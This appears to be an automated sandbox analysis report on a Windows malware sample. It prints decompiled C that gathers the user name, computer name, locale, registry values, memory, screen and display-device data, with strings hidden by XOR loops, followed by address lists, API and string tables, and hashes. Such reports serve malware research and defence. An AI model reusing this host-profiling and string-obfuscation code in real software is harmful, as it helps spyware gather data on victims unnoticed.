							if(_t1135 != 0x80000003) {
								__eflags = _t1135 - 0x80000004;
								if(_t1135 == 0x80000004) {
									_push(0x10);
									_push(_t1180 - 0x214);
									_t789 = _t1180 - 0x4f0;
									goto L94;
								}
							} else {
								_push(0x10);
								_push(_t1180 - 0x214);
								_t789 = _t1180 - 0x500;
								goto L94;
							}
						} else {
							_push(0x10);
							_push(_t802);
							_t789 = _t1180 - 0x510;
							L94:
							_push(_t789);
							E00201550();
							_t1184 = _t1184 + 0xc;
						}
						_t1135 = _t1135 + 1;
						__eflags = _t1135 -  *((intOrPtr*)(_t1180 - 0x1c0));
					} while (_t1135 <=  *((intOrPtr*)(_t1180 - 0x1c0)));
				}
				E001D2524(_t1180 - 0x268, _t1180 - 0x510);
				 *(_t1180 - 4) = 0xd;
				_t723 = E001DC1C8(_t1180 - 0x268, _t1180 - 0x26c);
				E001FA572(_t1180 - 0x1c4,  *((intOrPtr*)(E001DC1E3(_t1180 - 0x268, _t1180 - 0x278))),  *_t723);
				E001DC1F7(_t1180 - 0x268, _t1180 - 0x274,  *((intOrPtr*)(_t1180 - 0x1c4)),  *((intOrPtr*)(E001DC1C8(_t1180 - 0x268, _t1180 - 0x270))));
				GetSystemInfo(_t1180 - 0x534); // executed
				_t1169 =  *((intOrPtr*)(_t1180 - 0x520));
				_t732 = E001D3D59(_t1180 - 0x268);
				__eflags = 0;
				 *((intOrPtr*)(_t1180 - 0x20)) = 0x212909;
				_t1136 = _t732;
				_t1101 = 9;
				_t950 = 0;
				while(1) {
					 *(_t1180 + _t950 - 0x1f) =  *(_t1180 + _t950 - 0x1f) ^ _t1101;
					_t950 = _t950 + 1;
					__eflags = _t950 - 2;
					if(_t950 >= 2) {
						break;
					}
					_t442 = _t1180 - 0x20; // 0x212909
					_t1101 =  *_t442;
				}
				 *((char*)(_t1180 - 0x1d)) = 0;
				_t733 = E001D3B98(_t1136, _t1180 - 0x1f);
				_push(_t1169);
				_t1170 = E001F9503(_t733);
				 *((intOrPtr*)(_t1180 - 0x5c)) = 0x69652606;
				_t1103 = 6;
				 *((intOrPtr*)(_t1180 - 0x58)) = 0x2f756374;
				 *((char*)(_t1180 - 0x54)) = 0;
				_t953 = 0;
				while(1) {
					 *(_t1180 + _t953 - 0x5b) =  *(_t1180 + _t953 - 0x5b) ^ _t1103;
					_t953 = _t953 + 1;
					__eflags = _t953 - 7;
					if(_t953 >= 7) {
						break;
					}
					_t1103 =  *((intOrPtr*)(_t1180 - 0x5c));
				}
				 *((char*)(_t1180 - 0x54)) = 0;
				E001D3B98(_t1170, _t1180 - 0x5b);
				E001D3D59(0x24a6f8);
				_t1106 = 0x72;
				 *((intOrPtr*)(_t1180 - 0x86)) = 0x5f525272;
				 *((intOrPtr*)(_t1180 - 0x82)) = 0x3f332052;
				_t956 = 0;
				 *((short*)(_t1180 - 0x7e)) = 0x5248;
				 *((char*)(_t1180 - 0x7c)) = 0;
				while(1) {
					 *(_t1180 + _t956 - 0x85) =  *(_t1180 + _t956 - 0x85) ^ _t1106;
					_t956 = _t956 + 1;
					__eflags = _t956 - 9;
					if(_t956 >= 9) {
						break;
					}
					_t463 = _t1180 - 0x86; // 0x5f525272
					_t1106 =  *_t463;
				}
				 *((char*)(_t1180 - 0x7c)) = 0;
				E001D3B98(_t1180 - 0x328, _t1180 - 0x85);
				 *(_t1180 - 0x470) = 0x40;
				GlobalMemoryStatusEx(_t1180 - 0x470); // executed
				_t1137 =  *(_t1180 - 0x464);
				_t805 =  *(_t1180 - 0x468) -  *((intOrPtr*)(_t1180 - 0x460));
				asm("sbb edi, [ebp-0x45c]");
				E001FA544(_t1180 - 0x3e8, _t1180 - 0x85, ( *(_t1180 - 0x464) << 0x00000020 |  *(_t1180 - 0x468)) >> 0x14,  *(_t1180 - 0x464) >> 0x14);
				 *(_t1180 - 4) = 0xe;
				_t742 = E001D3D59(_t1180 - 0x3e8);
				_t1109 = 8;
				_t1171 = _t742;
				 *(_t1180 - 0x3c) = _t1109;
				 *((intOrPtr*)(_t1180 - 0x3b)) = 0x284a4528;
				_t964 = 0;
				__eflags = 0;
				 *((short*)(_t1180 - 0x37)) = 0x20;
				while(1) {
					 *(_t1180 + _t964 - 0x3b) =  *(_t1180 + _t964 - 0x3b) ^ _t1109;
					_t964 = _t964 + 1;
					__eflags = _t964 - 5;
					if(_t964 >= 5) {
						break;
					}
					_t1109 =  *(_t1180 - 0x3c);
				}
				_t488 = _t1180 - 0x3b; // 0x284a4528
				 *((char*)(_t1180 - 0x36)) = 0;
				E001D3B98(_t1171, _t488);
				E001FA544(_t1180 - 0x3d0, _t488, (_t1137 << 0x00000020 | _t805) >> 0x14, _t1137 >> 0x14);
				 *(_t1180 - 4) = 0xf;
				_t745 = E001D3D59(_t1180 - 0x3d0);
				_t1112 = 0x20;
				__eflags = 0;
				 *(_t1180 - 0x91) = _t1112;
				_t1173 = _t745;
				 *((intOrPtr*)(_t1180 - 0x90)) = 0x626d00;
				 *((intOrPtr*)(_t1180 - 0x8c)) = 0x44455355;
				_t970 = 0;
				 *((short*)(_t1180 - 0x88)) = 9;
				while(1) {
					 *(_t1180 + _t970 - 0x90) =  *(_t1180 + _t970 - 0x90) ^ _t1112;
					_t970 = _t970 + 1;
					__eflags = _t970 - 9;
					if(_t970 >= 9) {
						break;
					}
					_t1112 =  *(_t1180 - 0x91);
				}
				 *((char*)(_t1180 - 0x87)) = 0;
				E001D3B98(_t1173, _t1180 - 0x90);
				E001D2F2D(_t1180 - 0x3d0);
				 *(_t1180 - 4) = 0xd;
				E001D2F2D(_t1180 - 0x3e8);
				E001D3D59(0x24a6f8);
				asm("movaps xmm0, [0x23dbb0]");
				_t975 = 0;
				asm("movups [ebp-0x144], xmm0");
				 *((intOrPtr*)(_t1180 - 0x134)) = 0x4f52534a;
				 *((intOrPtr*)(_t1180 - 0x130)) = 0x61c4849;
				 *((char*)(_t1180 - 0x12c)) = 0;
				do {
					 *(_t1180 + _t975 - 0x143) =  *(_t1180 + _t975 - 0x143) ^  *(_t1180 - 0x144);
					_t975 = _t975 + 1;
					__eflags = _t975 - 0x17;
				} while (_t975 < 0x17);
				 *((char*)(_t1180 - 0x12c)) = 0;
				_t751 = E001D3B98(_t1180 - 0x328, _t1180 - 0x143);
				_t752 = GetSystemMetrics(0); // executed
				_push(_t752);
				_t753 = E001F9503(_t751);
				 *((char*)(_t1180 - 0x3d)) = 0;
				_t978 = 0x23;
				 *((char*)(_t1180 - 0x3f)) = 0x5b;
				 *(_t1180 - 0x3e) = _t978 ^ 0x0000005b;
				_t754 = E001D3B98(_t753, _t1180 - 0x3e);
				_push(GetSystemMetrics(1));
				E001F9503(_t754);
				E001D3D59(0x24a6f8);
				asm("movaps xmm0, [0x23dbc0]");
				_t983 = 0;
				__eflags = 0;
				_t808 = 0x4c;
				asm("movups [ebp-0x19e], xmm0");
				 *((short*)(_t1180 - 0x18e)) = 0x5c56;
				 *((char*)(_t1180 - 0x18c)) = 0x5a;
				 *(_t1180 - 0x18b) = _t808;
				 *((short*)(_t1180 - 0x18a)) = 5;
				do {
					 *(_t1180 + _t983 - 0x19d) =  *(_t1180 + _t983 - 0x19d) ^  *(_t1180 - 0x19e);
					_t983 = _t983 + 1;
					__eflags = _t983 - 0x14;
				} while (_t983 < 0x14);
				 *((char*)(_t1180 - 0x189)) = 0;
				E001D3B98(_t1180 - 0x328, _t1180 - 0x19d);
				E001D3D59(0x24a6f8);
				 *(_t1180 - 0x8a4) = 0x1a8;
				_t1177 = 0;
				_t762 = EnumDisplayDevicesA(0, 0, _t1180 - 0x8a4, 0);
				__eflags = _t762;
				if(_t762 > 0) {
					do {
						_t779 = E001D3B98(_t1180 - 0x328, "\t");
						_push(_t1177);
						E001D3B98(E001D3B98(E001F9503(_t779), ") "), _t1180 - 0x880);
						E001D3D59(0x24a6f8);
						E001D3D59(0x24a6f8);
						_t1177 = _t1177 + 1;
						_t786 = EnumDisplayDevicesA(0, 0, _t1180 - 0x8a4, 0);
						__eflags = _t1177 - _t786;
					} while (_t1177 < _t786);
				}
				 *(_t1180 - 0xf8) = _t808;
				_t763 = 0;
				__eflags = 0;
				 *((intOrPtr*)(_t1180 - 0xf7)) = 0x61616161;
				 *((intOrPtr*)(_t1180 - 0xf3)) = 0x61616161;
				 *((intOrPtr*)(_t1180 - 0xef)) = 0x61616161;
				 *((short*)(_t1180 - 0xeb)) = 0x61;
				while(1) {
					 *(_t1180 + _t763 - 0xf7) =  *(_t1180 + _t763 - 0xf7) ^ _t808;
					_t763 = _t763 + 1;
					__eflags = _t763 - 0xd;
					if(_t763 >= 0xd) {
						break;
					}
					_t808 =  *(_t1180 - 0xf8);
				}
				_t554 = _t1180 - 0xf7; // 0x61616161
				 *((char*)(_t1180 - 0xea)) = 0;
				E001D3B98(_t1180 - 0x328, _t554);
				E001D3D59(0x24a6f8);
				E001D3D59(0x24a6f8);
				E001F917D(_t1180 - 0x338); // executed
				E001F628C(_t1180 - 0x338, 0x24a6f8, __eflags); // executed
				E001D2F2D(_t1180 - 0x268);
				E001F7177(_t1180 - 0x338);
				E001D2F2D(_t1180 - 0x358);
				E001D2F2D(_t1180 - 0x400);
				E001D2F2D(_t1180 - 0x418);
				E001D2F2D(_t1180 - 0x430);
				E001D2F2D(_t1180 - 0x370);
				E001D2F2D(_t1180 - 0x388);
				E001D2F2D(_t1180 - 0x3a0);
				_t778 = E001D2F2D(_t1180 - 0x3b8);
				 *[fs:0x0] =  *((intOrPtr*)(_t1180 - 0xc));
				return _t778;
			}

0x001f7819
0x001f7819
0x001f7819
0x001f781e
0x001f7823
0x001f782b
0x001f7835
0x001f783a
0x001f7848
0x001f7850
0x001f785b
0x001f7863
0x001f786e
0x001f7879
0x001f7884
0x001f788f
0x001f789a
0x001f78a5
0x001f78b0
0x001f78bb
0x001f78bf
0x001f78c6
0x001f78cf
0x001f78dc
0x001f78e2
0x001f78eb
0x001f78ec
0x001f78ee
0x001f78f7
0x001f78f9
0x001f78ff
0x001f7909
0x001f790b
0x001f7915
0x001f791f
0x001f791f
0x001f7926
0x001f792a
0x00000000
0x00000000
0x001f792c
0x001f792c
0x001f793b
0x001f794f
0x001f7963
0x001f7968
0x001f797f
0x001f7985
0x001f798d
0x001f7997
0x001f799a
0x001f79a1
0x001f79a6
0x001f79ba
0x001f79bf
0x001f79c6
0x001f79c6
0x001f79c8
0x001f79cf
0x001f79d9
0x001f79e3
0x001f79ea
0x001f79f7
0x001f79fe
0x001f79ff
0x001f79ff
0x001f7a04
0x001f7a0b
0x001f7a18
0x001f7a26
0x001f7a3d
0x001f7a3f
0x001f7a43
0x001f7a43
0x001f7a45
0x001f7a4c
0x001f7a53
0x001f7a5d
0x001f7a66
0x001f7a73
0x001f7a7a
0x001f7a7b
0x001f7a7b
0x001f7a87
0x001f7a94
0x001f7a9c
0x001f7aa2
0x001f7aad
0x001f7ab8
0x001f7abb
0x001f7acd
0x001f7acf
0x001f7ad9
0x001f7adb
0x001f7ae5
0x001f7aef
0x001f7aef
0x001f7af1
0x001f7afa
0x001f7b01
0x001f7b01
0x001f7b08
0x001f7b09
0x001f7b0c
0x00000000
0x00000000
0x001f7b0e
0x001f7b0e
0x001f7b1c
0x001f7b37
0x001f7b39
0x001f7b40
0x001f7b42
0x001f7b48
0x001f7b48
0x001f7b4a
0x001f7b4a
0x001f7b4e
0x001f7b4f
0x001f7b52
0x00000000
0x00000000
0x001f7b54
0x001f7b54
0x001f7b5c
0x001f7b62
0x001f7b74
0x001f7b76
0x001f7b7d
0x001f7b7f
0x001f7b85
0x001f7b89
0x001f7b89
0x001f7b8b
0x001f7b8e
0x001f7b94
0x001f7b94
0x001f7b98
0x001f7b99
0x001f7b9b
0x00000000
0x00000000
0x001f7b9d
0x001f7b9d
0x001f7ba5
0x001f7bab
0x001f7bbe
0x001f7bd0
0x001f7bd4
0x001f7bda
0x001f7be4
0x001f7be7
0x001f7beb
0x001f7bf2
0x001f7c16
0x001f7c21
0x001f7c24
0x001f7c34
0x001f7c39
0x001f7c3b
0x001f7c45
0x001f7c47
0x001f7c51
0x001f7c53
0x001f7c5d
0x001f7c66
0x001f7c68
0x001f7c6e
0x001f7c6e
0x001f7c75
0x001f7c76
0x001f7c79
0x00000000
0x00000000
0x001f7c7b
0x001f7c7b
0x001f7c89
0x001f7c96
0x001f7c98
0x001f7c9d
0x001f7c9f
0x001f7ca1
0x001f7cca
0x001f7ccc
0x001f7cd3
0x001f7cda
0x001f7cdd
0x001f7cdd
0x001f7ce1
0x001f7ce2
0x001f7ce5
0x00000000
0x00000000
0x001f7ce7
0x001f7ce7
0x001f7ce7
0x001f7cec
0x001f7cef
0x001f7ca3
0x001f7ca3
0x001f7ca5
0x001f7cac
0x001f7cb3
0x001f7cb3
0x001f7cb7
0x001f7cb8
0x001f7cbb
0x00000000
0x00000000
0x001f7cbd
0x001f7cbd
0x001f7cc2
0x001f7cc5
0x001f7cc5
0x001f7cf4
0x001f7d06
0x001f7d14
0x001f7d16
0x001f7d20
0x001f7d22
0x001f7d2c
0x001f7d36
0x001f7d38
0x001f7d41
0x001f7d47
0x001f7d47
0x001f7d4e
0x001f7d4f
0x001f7d52
0x00000000
0x00000000
0x001f7d54
0x001f7d54
0x001f7d62
0x001f7d6a
0x001f7d78
0x001f7d81
0x001f7d86
0x001f7d88
0x001f7d92
0x001f7d9c
0x001f7d9e
0x001f7da8
0x001f7db1
0x001f7db7
0x001f7db7
0x001f7dbe
0x001f7dbf
0x001f7dc2
0x00000000
0x00000000
0x001f7dc4
0x001f7dc4
0x001f7dd2
0x001f7dde
0x001f7de3
0x001f7deb
0x001f7df4
0x001f7df9
0x001f7e00
0x001f7e02
0x001f7e09
0x001f7e0f
0x001f7e1c
0x001f7e23
0x001f7e24
0x001f7e24
0x001f7e2f
0x001f7e3b
0x001f7e40
0x001f7e48
0x001f7e51
0x001f7e56
0x001f7e58
0x001f7e62
0x001f7e6c
0x001f7e6e
0x001f7e78
0x001f7e7e
0x001f7e7e
0x001f7e85
0x001f7e86
0x001f7e89
0x00000000
0x00000000
0x001f7e8b
0x001f7e8b
0x001f7e99
0x001f7ea5
0x001f7eaa
0x001f7eb2
0x001f7ebb
0x001f7ec4
0x001f7ec9
0x001f7ed0
0x001f7ed2
0x001f7ed9
0x001f7ee3
0x001f7ee9
0x001f7ef6
0x001f7efd
0x001f7efe
0x001f7efe
0x001f7f09
0x001f7f15
0x001f7f1e
0x001f7f23
0x001f7f2a
0x001f7f2c
0x001f7f33
0x001f7f3d
0x001f7f46
0x001f7f4c
0x001f7f59
0x001f7f60
0x001f7f61
0x001f7f61
0x001f7f6c
0x001f7f85
0x001f7f8e
0x001f7f93
0x001f7f9a
0x001f7f9a
0x001f7f9e
0x001f7f9f
0x001f7fa6
0x001f7fad
0x001f7fb3
0x001f7fbd
0x001f7fc4
0x001f7fca
0x001f7fd1
0x001f7fd2
0x001f7fd2
0x001f7fdd
0x001f7fea
0x001f7ff7
0x001f7ffe
0x001f8004
0x001f8012
0x001f8019
0x001f8020
0x001f8023
0x001f802a
0x001f802b
0x001f802e
0x001f802e
0x001f8030
0x001f8037
0x001f803e
0x001f8042
0x001f8042
0x001f8046
0x001f8047
0x001f8049
0x00000000
0x00000000
0x001f804b
0x001f804b
0x001f8050
0x001f8053
0x001f805d
0x001f806a
0x001f8073
0x001f8078
0x001f807f
0x001f807f
0x001f8083
0x001f808a
0x001f808b
0x001f8098
0x001f809f
0x001f80a0
0x001f80a0
0x001f80ab
0x001f80b8
0x001f80ca
0x001f80cc
0x001f80d3
0x001f80d5
0x001f80d5
0x001f80d7
0x001f80d7
0x001f80db
0x001f80dc
0x001f80df
0x00000000
0x00000000
0x001f80e1
0x001f80e1
0x001f80e9
0x001f80ef
0x001f8101
0x001f8103
0x001f810a
0x001f810c
0x001f8110
0x001f8110
0x001f8112
0x001f8112
0x001f8116
0x001f8117
0x001f811a
0x00000000
0x00000000
0x001f811c
0x001f811c
0x001f8124
0x001f812a
0x001f813c
0x001f813e
0x001f8145
0x001f8147
0x001f8147
0x001f8149
0x001f8149
0x001f814d
0x001f814e
0x001f8151
0x00000000
0x00000000
0x001f8153
0x001f8153
0x001f815b
0x001f8161
0x001f8173
0x001f8175
0x001f8178
0x001f817e
0x001f817e
0x001f8180
0x001f8184
0x001f8184
0x001f8188
0x001f8189
0x001f818c
0x00000000
0x00000000
0x001f818e
0x001f818e
0x001f8193
0x001f819a
0x001f819d
0x001f81aa
0x001f81b1
0x001f81b2
0x001f81b4
0x001f81b7
0x001f81bd
0x001f81bf
0x001f81c2
0x001f81c2
0x001f81c6
0x001f81c7
0x001f81ca
0x00000000
0x00000000
0x001f81cc
0x001f81cc
0x001f81d4
0x001f81d9
0x001f81e6
0x001f81ed
0x001f81f1
0x001f81f4
0x001f81f7
0x001f81ff
0x001f820b
0x001f8210
0x001f8217
0x001f8219
0x001f8220
0x001f822a
0x001f8237
0x001f823e
0x001f823f
0x001f823f
0x001f824a
0x001f8256
0x001f825d
0x001f8275
0x001f8283
0x001f828f
0x001f8294
0x001f829b
0x001f829d
0x001f82a4
0x001f82b1
0x001f82b8
0x001f82b9
0x001f82b9
0x001f82c4
0x001f82d0
0x001f82d7
0x001f82ef
0x001f82f9
0x001f8307
0x001f830c
0x001f8313
0x001f8315
0x001f831c
0x001f8326
0x001f8330
0x001f8339
0x001f8346
0x001f834d
0x001f834e
0x001f834e
0x001f8359
0x001f8365
0x001f836a
0x001f837b
0x001f8380
0x001f8388
0x001f8391
0x001f8396
0x001f839d
0x001f839f
0x001f83a6
0x001f83b0
0x001f83bd
0x001f83c4
0x001f83c5
0x001f83c5
0x001f83d0
0x001f83dc
0x001f83e9
0x001f83f2
0x001f83f7
0x001f83fe
0x001f8400
0x001f8407
0x001f8410
0x001f8416
0x001f8423
0x001f842a
0x001f842b
0x001f842b
0x001f8436
0x001f8447
0x001f8449
0x001f844e
0x001f8450
0x001f8452
0x001f847d
0x001f847f
0x001f8486
0x001f8489
0x001f8489
0x001f848d
0x001f848e
0x001f8491
0x00000000
0x00000000
0x001f8493
0x001f8493
0x001f8498
0x001f849b
0x001f8454
0x001f8454
0x001f8456
0x001f845c
0x001f845e
0x001f8462
0x001f8466
0x001f8466
0x001f846a
0x001f846b
0x001f846e
0x00000000
0x00000000
0x001f8470
0x001f8470
0x001f8475
0x001f8478
0x001f8478
0x001f84a0
0x001f84a9
0x001f84ae
0x001f84b0
0x001f84b7
0x001f84be
0x001f84c0
0x001f84c6
0x001f84c9
0x001f84c9
0x001f84cd
0x001f84ce
0x001f84d1
0x00000000
0x00000000
0x001f84d3
0x001f84d3
0x001f84d8
0x001f84db
0x001f84e4
0x001f84e9
0x001f84f0
0x001f84f9
0x001f84fa
0x001f84fe
0x001f8506
0x001f850c
0x001f850e
0x001f8511
0x001f8514
0x001f8517
0x001f851d
0x001f8523
0x001f8525
0x001f8527
0x001f852b
0x001f852c
0x001f852e
0x001f8531
0x001f8537
0x001f8539
0x001f853c
0x001f853f
0x001f8542
0x001f8548
0x001f8557
0x001f855d
0x001f8570
0x001f8576
0x001f857e
0x001f8580
0x001f8581
0x00000000
0x001f8581
0x001f855f
0x001f8565
0x001f8567
0x001f8568
0x00000000
0x001f8568
0x001f854a
0x001f854c
0x001f854e
0x001f854f
0x001f8587
0x001f8587
0x001f8588
0x001f858d
0x001f858d
0x001f8590
0x001f8591
0x001f8591
0x001f8527
0x001f85a6
0x001f85b1
0x001f85bc
0x001f85e3
0x001f8611
0x001f861d
0x001f8623
0x001f8635
0x001f863a
0x001f863c
0x001f8643
0x001f8645
0x001f8647
0x001f8649
0x001f8649
0x001f864d
0x001f864e
0x001f8651
0x00000000
0x00000000
0x001f8653
0x001f8653
0x001f8653
0x001f865b
0x001f8660
0x001f8665
0x001f866d
0x001f866f
0x001f8676
0x001f8678
0x001f867f
0x001f8682
0x001f8684
0x001f8684
0x001f8688
0x001f8689
0x001f868c
0x00000000
0x00000000
0x001f868e
0x001f868e
0x001f8696
0x001f869b
0x001f86a7
0x001f86ac
0x001f86ae
0x001f86b8
0x001f86c2
0x001f86c4
0x001f86ca
0x001f86cd
0x001f86cd
0x001f86d4
0x001f86d5
0x001f86d8
0x00000000
0x00000000
0x001f86da
0x001f86da
0x001f86da
0x001f86e8
0x001f86f1
0x001f86fc
0x001f8707
0x001f871b
0x001f871d
0x001f8723
0x001f8738
0x001f8745
0x001f874f
0x001f8756
0x001f8757
0x001f8759
0x001f875c
0x001f8763
0x001f8763
0x001f8765
0x001f876b
0x001f876b
0x001f876f
0x001f8770
0x001f8773
0x00000000
0x00000000
0x001f8775
0x001f8775
0x001f877a
0x001f877d
0x001f8783
0x001f8799
0x001f87a6
0x001f87ac
0x001f87b3
0x001f87b4
0x001f87b6
0x001f87bc
0x001f87be
0x001f87c8
0x001f87d2
0x001f87d4
0x001f87dd
0x001f87dd
0x001f87e4
0x001f87e5
0x001f87e8
0x00000000
0x00000000
0x001f87ea
0x001f87ea
0x001f87f8
0x001f8800
0x001f880b
0x001f8816
0x001f881a
0x001f882a
0x001f882f
0x001f8836
0x001f8838
0x001f883f
0x001f8849
0x001f8853
0x001f8859
0x001f885f
0x001f8866
0x001f8867
0x001f8867
0x001f8872
0x001f887e
0x001f888c
0x001f888e
0x001f8891
0x001f8898
0x001f889d
0x001f88a0
0x001f88a3
0x001f88ab
0x001f88b6
0x001f88b9
0x001f88c7
0x001f88cc
0x001f88d3
0x001f88d3
0x001f88d7
0x001f88d8
0x001f88df
0x001f88e8
0x001f88ef
0x001f88f5
0x001f88fe
0x001f8904
0x001f890b
0x001f890c
0x001f890c
0x001f8917
0x001f8924
0x001f892d
0x001f8940
0x001f894e
0x001f8950
0x001f8952
0x001f8954
0x001f8956
0x001f8961
0x001f8966
0x001f8982
0x001f898e
0x001f899a
0x001f89ab
0x001f89ac
0x001f89ae
0x001f89ae
0x001f8956
0x001f89b2
0x001f89b8
0x001f89b8
0x001f89ba
0x001f89c4
0x001f89ce
0x001f89d8
0x001f89e2
0x001f89e2
0x001f89e9
0x001f89ea
0x001f89ed
0x00000000
0x00000000
0x001f89ef
0x001f89ef
0x001f89f7
0x001f89fd
0x001f8a0a
0x001f8a18
0x001f8a21
0x001f8a2c
0x001f8a31
0x001f8a3c
0x001f8a47
0x001f8a52
0x001f8a5d
0x001f8a68
0x001f8a73
0x001f8a7e
0x001f8a89
0x001f8a94
0x001f8a9f
0x001f8aa9
0x001f8ab1

APIs

__EH_prolog.LIBCMT ref: 001F781E

Part of subcall function 001F73C6: __EH_prolog.LIBCMT ref: 001F73CB
Part of subcall function 001F73C6: RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?,?,?), ref: 001F746F
Part of subcall function 001F73C6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,?,?), ref: 001F74BD
Part of subcall function 001F73C6: RegCloseKey.ADVAPI32(?,?,?), ref: 001F74C6

_strftime.LIBCMT ref: 001F794F
GetUserDefaultLCID.KERNEL32(00001001,?,00000100), ref: 001F7978
GetLocaleInfoA.KERNEL32(00000000), ref: 001F797F
GetUserNameA.ADVAPI32(?,?), ref: 001F7BD0
GetComputerNameA.KERNEL32 ref: 001F8275
GetUserNameA.ADVAPI32(?,00000101), ref: 001F82EF
GetSystemInfo.KERNEL32(?,?,?,00000000,?,?,?,?,?,?), ref: 001F861D
GlobalMemoryStatusEx.KERNEL32(?,?), ref: 001F8707
GetSystemMetrics.USER32 ref: 001F888C

Part of subcall function 001F9503: __EH_prolog.LIBCMT ref: 001F9508

Part of subcall function 001D3B98: __EH_prolog.LIBCMT ref: 001D3B9D

GetSystemMetrics.USER32 ref: 001F88B4
EnumDisplayDevicesA.USER32(00000000,00000000,?,00000000), ref: 001F8950
EnumDisplayDevicesA.USER32(00000000,00000000,?,00000000), ref: 001F89AC

Strings

/Ifc, xrefs: 001F7E62
`bnx, xrefs: 001F7D9E
3>58, xrefs: 001F7ADB
)!, xrefs: 001F8653
x, xrefs: 001F7B42
9}<), xrefs: 001F7AE5
x, xrefs: 001F7FA6
F"#5-2)6, xrefs: 001F7CE7
:TN, xrefs: 001F8326
!;, xrefs: 001F8407
@, xrefs: 001F86FC
00, xrefs: 001F7D38
4L, xrefs: 001F8456
KKFK";QK, xrefs: 001F8050
+Hdd, xrefs: 001F7D92
:, xrefs: 001F8330
2'6i, xrefs: 001F7A53
aaaaaaaaaaaaa, xrefs: 001F89F7
USED, xrefs: 001F87C8
am, xrefs: 001F8178
XLJH, xrefs: 001F7F33
JSRO, xrefs: 001F883F
0000, xrefs: 001F7D2C
1+, xrefs: 001F7DA8
m{, xrefs: 001F7B7F
5/, xrefs: 001F84C0
(EJ( , xrefs: 001F877A
Z, xrefs: 001F88E8
., xrefs: 001F81ED
V\, xrefs: 001F88DF
v, xrefs: 001F7B85
qt, xrefs: 001F7915
s, xrefs: 001F7A5D
rRR_R 3?HR, xrefs: 001F86DA
j|5/, xrefs: 001F7E6E
Wed Sep 8 00:01:38 2021, xrefs: 001F7A2B
g}, xrefs: 001F7AF1
isut, xrefs: 001F831C
2p]F, xrefs: 001F7B76
FPFY, xrefs: 001F79D9
/L_Z, xrefs: 001F84B7
0000, xrefs: 001F7D22
Qt, xrefs: 001F78EE
tcu/, xrefs: 001F8678
t5q|, xrefs: 001F790B

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog$NameSystemUser$DevicesDisplayEnumInfoMetrics$CloseComputerDefaultGlobalLocaleMemoryOpenQueryStatusValue_strftime
String ID: )!$ :TN$!;$(EJ( $+Hdd$.$/Ifc$/L_Z$00$0000$0000$1+$2'6i$2p]F$3>58$4L$5/$9}<)$:$@$F"#5-2)6$FPFY$JSRO$KKFK";QK$Qt$USED$V\$Wed Sep 8 00:01:38 2021$XLJH$Z$`bnx$aaaaaaaaaaaaa$am$g}$isut$j|5/$m{$qt$rRR_R 3?HR$s$t5q|$tcu/$v$x$x
API String ID: 3358139242-1880763767
Opcode ID: 0c9fe49b944b3ac96cdafe8d0730e9ca717e9d2a823bac250e0eb528613a119b
Instruction ID: 65c7ac3937a5aed460a55ef1d93f47cfcc70bb6697d55bc4ac1a8230ece9d745
Opcode Fuzzy Hash: 0c9fe49b944b3ac96cdafe8d0730e9ca717e9d2a823bac250e0eb528613a119b
Instruction Fuzzy Hash: 07B2E230A082988ACF25DB74D8A57EDBB71AF66300F4445EED4596B392EB700F89CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001F628C, Relevance: 88.6, APIs: 37, Strings: 13, Instructions: 1081
registryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E001F628C(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __esi;
				void* _t525;
				long _t533;
				int _t537;
				int _t540;
				int _t548;
				int _t551;
				int* _t555;
				signed int* _t560;
				void* _t565;
				void* _t576;
				signed int _t578;
				void* _t580;
				void* _t583;
				int _t584;
				int _t585;
				void* _t586;
				void* _t587;
				int _t594;
				int _t598;
				int _t605;
				signed int _t610;
				void* _t620;
				void* _t622;
				int _t629;
				void* _t637;
				void* _t638;
				void* _t644;
				void* _t646;
				int _t654;
				signed int _t661;
				void* _t672;
				void* _t674;
				int _t679;
				void* _t687;
				void* _t688;
				void* _t694;
				void* _t696;
				int _t702;
				signed int _t709;
				void* _t720;
				char _t721;
				void* _t723;
				int _t728;
				void* _t736;
				void* _t737;
				void* _t743;
				void* _t745;
				char _t748;
				int* _t751;
				signed int _t752;
				void* _t753;
				signed int* _t756;
				int _t757;
				void* _t761;
				int* _t764;
				signed int _t771;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				void* _t779;
				int _t787;
				int _t791;
				signed char _t795;
				void* _t801;
				void* _t803;
				void* _t805;
				void* _t809;
				void* _t819;
				void* _t821;
				int _t823;
				void* _t829;
				void* _t831;
				signed char _t837;
				void* _t847;
				void* _t849;
				int _t851;
				void* _t857;
				signed char _t859;
				signed char _t860;
				void* _t866;
				void* _t876;
				signed char _t878;
				signed char _t879;
				signed char _t890;
				int _t898;
				int _t899;
				int* _t901;
				signed char _t902;
				signed char _t903;
				signed char _t904;
				signed char _t907;
				signed char _t908;
				signed char _t909;
				signed char _t910;
				signed char _t911;
				void* _t912;
				void* _t913;
				signed char _t916;
				signed char _t917;
				signed char _t918;
				signed char _t919;
				void* _t920;
				void* _t921;
				signed char _t922;
				signed char _t925;
				void* _t926;
				int _t928;
				int _t930;
				int _t932;
				int _t933;
				signed int* _t934;
				int _t935;
				int _t939;
				int _t941;
				signed int* _t942;
				int _t944;
				void* _t945;
				int _t946;
				void* _t947;
				void* _t949;

				L00227790(0x22aa30, _t947);
				E002010E0(0x31f0);
				_t748 = 0;
				 *(_t947 - 0x7c) = 0;
				 *(_t947 - 0x78) = 0;
				 *((intOrPtr*)(_t947 - 0x74)) = 0;
				_push(__ecx);
				_t761 = _t947 - 0x1fc;
				 *((intOrPtr*)(_t947 - 4)) = 0;
				E001F922A(_t761);
				 *((char*)(_t947 - 4)) = 1;
				 *((intOrPtr*)(_t947 - 0xc0)) = 1;
